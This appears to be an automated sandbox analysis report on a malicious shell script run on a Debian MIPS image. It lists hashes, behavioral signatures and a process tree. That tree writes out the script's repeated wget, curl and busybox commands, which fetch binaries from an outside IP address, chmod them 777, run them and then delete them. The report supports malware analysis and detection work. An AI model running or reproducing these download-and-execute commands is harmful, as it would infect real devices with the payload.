Analysis
-
max time kernel
56s -
max time network
58s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
10-11-2024 01:00
Static task
static1
Behavioral task
behavioral1
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh
-
Size
10KB
-
MD5
0aab00d4e7063c05a4a2623bcf37a039
-
SHA1
f155f96de5ba4dba0e81f04fc0b9739488955248
-
SHA256
0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574
-
SHA512
e4d19d1c05c96c81636e67f4a78b9021ac9ee306b17c30fbdf68f0f3bc52d9a0b7a2d1fb6706b5a507f7b1bbca57e1a2c5875c4dbe57c90cb180aeeafc800b0c
-
SSDEEP
192:U4GT9Uq+r7f9jOytEsjARO9Uq+r7fOOytEsOQ:U4GmJ/ARHfQ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 974 chmod 914 chmod 956 chmod 869 chmod 920 chmod 771 chmod 809 chmod 746 chmod 932 chmod 908 chmod 740 chmod 890 chmod 875 chmod 884 chmod 896 chmod 802 chmod 863 chmod 815 chmod 857 chmod 938 chmod 980 chmod 944 chmod 950 chmod 926 chmod 962 chmod 968 chmod 842 chmod 902 chmod -
Executes dropped EXE 28 IoCs
Processes:
d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0JV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRpgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugqScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAVz0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7Bqf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVRV0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpvtrEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3ymHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnFhwWR62XfsZaEQXPNSWWZ2esDst57v7Zudlnna1tBnMuEdluE4QBbRNp9nEdX5f9IHiugd6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMOb4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0Jioc pid process /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 741 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 747 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 773 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 803 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 810 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 816 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 843 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 858 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 864 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 870 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 876 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 885 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 891 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 897 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt 903 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV 909 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B 915 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc 921 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR 927 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv 933 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 939 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 945 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y 951 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF 957 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl 963 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug 969 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO 975 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J 981 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J -
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF curl File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug curl File opened for modification /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv curl File opened for modification /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 curl File opened for modification /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl curl File opened for modification /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt curl File opened for modification /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV curl File opened for modification /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR curl
Processes
-
/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh/tmp/0491ed426c15fab2ce6c778d2a7857aaa4e517fec58524b71c1a7e6ea4e8a574.sh1⤵PID:709
-
/bin/rm/bin/rm bins.sh2⤵PID:712
-
/usr/bin/wgetwget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:717
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:737 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:739
-
/bin/chmodchmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- File and Directory Permissions Modification
PID:740 -
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵
- Executes dropped EXE
PID:741 -
/bin/rmrm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO2⤵PID:742
-
/usr/bin/wgetwget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:743
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:745
-
/bin/chmodchmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- File and Directory Permissions Modification
PID:746 -
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵
- Executes dropped EXE
PID:747 -
/bin/rmrm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J2⤵PID:749
-
/usr/bin/wgetwget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:751
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:766
-
/bin/chmodchmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- File and Directory Permissions Modification
PID:771 -
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵
- Executes dropped EXE
PID:773 -
/bin/rmrm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv2⤵PID:776
-
/usr/bin/wgetwget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:777
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:784 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:797
-
/bin/chmodchmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- File and Directory Permissions Modification
PID:802 -
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵
- Executes dropped EXE
PID:803 -
/bin/rmrm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB32⤵PID:805
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:806
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:807 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:808
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:809 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:810 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:811
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:812
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:814
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:815 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:816 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:819
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:820
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:827 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:836
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:842 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:843 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:847
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:848
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:855 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:856
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:857 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:858 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:859
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:860
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:862
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- File and Directory Permissions Modification
PID:863 -
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Executes dropped EXE
PID:864 -
/bin/rmrm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:865
-
/usr/bin/wgetwget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:866
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:868
-
/bin/chmodchmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- File and Directory Permissions Modification
PID:869 -
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵
- Executes dropped EXE
PID:870 -
/bin/rmrm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj52⤵PID:871
-
/usr/bin/wgetwget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:872
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:874
-
/bin/chmodchmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- File and Directory Permissions Modification
PID:875 -
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵
- Executes dropped EXE
PID:876 -
/bin/rmrm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y2⤵PID:877
-
/usr/bin/wgetwget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:878
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:883
-
/bin/chmodchmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- File and Directory Permissions Modification
PID:884 -
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵
- Executes dropped EXE
PID:885 -
/bin/rmrm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF2⤵PID:886
-
/usr/bin/wgetwget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:887
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:889
-
/bin/chmodchmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- File and Directory Permissions Modification
PID:890 -
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵
- Executes dropped EXE
PID:891 -
/bin/rmrm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl2⤵PID:892
-
/usr/bin/wgetwget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:893
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:895
-
/bin/chmodchmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- File and Directory Permissions Modification
PID:896 -
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵
- Executes dropped EXE
PID:897 -
/bin/rmrm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug2⤵PID:898
-
/usr/bin/wgetwget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:899
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:901
-
/bin/chmodchmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- File and Directory Permissions Modification
PID:902 -
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵
- Executes dropped EXE
PID:903 -
/bin/rmrm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt2⤵PID:904
-
/usr/bin/wgetwget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:905
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:907
-
/bin/chmodchmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- File and Directory Permissions Modification
PID:908 -
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵
- Executes dropped EXE
PID:909 -
/bin/rmrm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV2⤵PID:910
-
/usr/bin/wgetwget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:911
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:913
-
/bin/chmodchmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- File and Directory Permissions Modification
PID:914 -
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵
- Executes dropped EXE
PID:915 -
/bin/rmrm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B2⤵PID:916
-
/usr/bin/wgetwget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:917
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:919
-
/bin/chmodchmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- File and Directory Permissions Modification
PID:920 -
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵
- Executes dropped EXE
PID:921 -
/bin/rmrm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc2⤵PID:922
-
/usr/bin/wgetwget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:923
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924 -
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵PID:925
-
/bin/chmodchmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR2⤵
